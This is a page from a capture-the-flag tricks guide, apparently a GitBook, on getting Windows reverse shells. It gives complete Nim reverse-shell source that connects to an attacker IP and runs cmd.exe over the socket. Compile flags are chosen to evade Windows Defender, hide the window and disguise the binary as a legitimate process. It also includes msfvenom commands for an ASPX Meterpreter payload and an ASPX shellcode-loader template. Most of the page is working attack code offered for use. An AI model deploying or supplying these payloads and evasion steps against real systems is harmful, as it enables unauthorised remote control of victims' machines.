> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-7/reverse-shell/trick-0142/initial-access-reverse-shell-windows.md).

# Windows

## Compile Nim Reverse Shell for AV Evasion

Compile a reverse shell payload using the Nim programming language. This can help bypass Windows Defender as signatures for less common languages are less frequent.

A basic Nim reverse shell payload can be crafted to connect back to a specified IP address and port.

```nim
import os, socket, winlean

proc main() =
  var
    sa: Sockaddr_in
    s: Socket

  sa.sin_family = AF_INET
  sa.sin_port = htons(443) # Attacker's listening port
  sa.sin_addr.s_addr = inet_addr("192.168.1.100") # Attacker's IP

  s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)

  if connect(s, addr(sa), sizeof(sa)) != 0:
    return

  var
    si: STARTUPINFO
    pi: PROCESS_INFORMATION

  si.cb = sizeof(si)
  si.dwFlags = STARTF_USESTDHANDLES
  si.hStdInput = cast[HANDLE](s)
  si.hStdOutput = cast[HANDLE](s)
  si.hStdError = cast[HANDLE](s)

  if CreateProcess(nil, "cmd.exe", nil, nil, true, CREATE_NO_WINDOW, nil, nil, addr(si), addr(pi)) == false:
    return

  CloseHandle(pi.hProcess)
  CloseHandle(pi.hThread)
  closesocket(s)

when isMainModule:
  main()
```

First, modify the Nim source file with the attacker's IP address and listening port. In the code above, you would change `htons(443)` to your desired port and `inet_addr("192.168.1.100")` to your attacker machine's IP.

The `CreateProcess` function is then used to execute `cmd.exe`, redirecting its standard input, output, and error streams to the connected socket using the `STARTUPINFO` structure and the `STARTF_USESTDHANDLES` flag. The `CREATE_NO_WINDOW` flag is used to prevent a command prompt window from appearing.

Then, compile the script using the Nim compiler. To target Windows and avoid a console window pop-up, you can use the MinGW backend and specify the GUI application type. Name the output executable appropriately (e.g., `spoofer-scheduler.exe` to mimic a legitimate process).

```bash
nim c -d:mingw --app:gui -o:spoofer-scheduler.exe rev_shell.nim
```

The `-d:mingw` flag specifies that we want to use the MinGW compiler backend to compile the Nim code into an executable. The `--app:gui` flag specifies that we want to compile the program as a GUI application. This is important because it prevents a console window from popping up when the executable is run, which can be useful for stealthy operations. The `-o:spoofer-scheduler.exe` flag sets the output filename.

Alternatively, you can compile for a release version optimized for size and linked statically using:

```bash
nim c -d:release --opt:size --passL:"-static" -o:rev_shell.exe rev_shell.nim
```

The resulting `.exe` file is your Nim-based reverse shell.

***

## Generate Aspx Reverse Shell

Generate an ASPX payload for a Windows reverse shell using `msfvenom`. Replace `<host>` and `<port>` with your listener's IP and port.

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<host> LPORT=<port> -f aspx > shell.aspx
```

Another common syntax for generating the Meterpreter reverse TCP payload for Windows in ASPX format is:

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port> -f aspx > shell.aspx
```

This command creates an ASPX file containing the shellcode. The resulting file is an ASP.NET web page designed to execute the embedded shellcode when accessed. A typical structure for such an ASPX reverse shell payload involves embedding the shellcode within a script block and using Windows API calls like `VirtualAlloc`, `Marshal.Copy`, and `CreateThread` to allocate memory, copy the shellcode into it, and execute it.

The generated `shell.aspx` file will resemble the following structure:

```aspx
<%@ Page Language="C#" AutoEventWireup="true" %>
<script runat="server">
    private void Page_Load(object sender, EventArgs e)
    {
        byte[] shellcode = new byte[] {
            // YOUR SHELLCODE HERE
        };

        IntPtr funcAddr = VirtualAlloc(0, (uint)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        System.Runtime.InteropServices.Marshal.Copy(shellcode, 0, funcAddr, shellcode.Length);
        CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, 0);
    }

    [System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    private static extern IntPtr VirtualAlloc(uint lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

    [System.Runtime.InteropServices.DllImport("kernel32.dll")]
    private static extern IntPtr CreateThread(uint lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, uint lpThreadId);

    private const uint MEM_COMMIT = 0x1000;
    private const uint PAGE_EXECUTE_READWRITE = 0x40;
</script>
```

The `shellcode` byte array contains the actual reverse shell code generated by `msfvenom`, and the C# code within the `<script runat="server">` block handles its execution when the ASPX page is processed by an IIS server with ASP.NET enabled. The `Page_Load` event handler ensures the code runs when the page is requested.
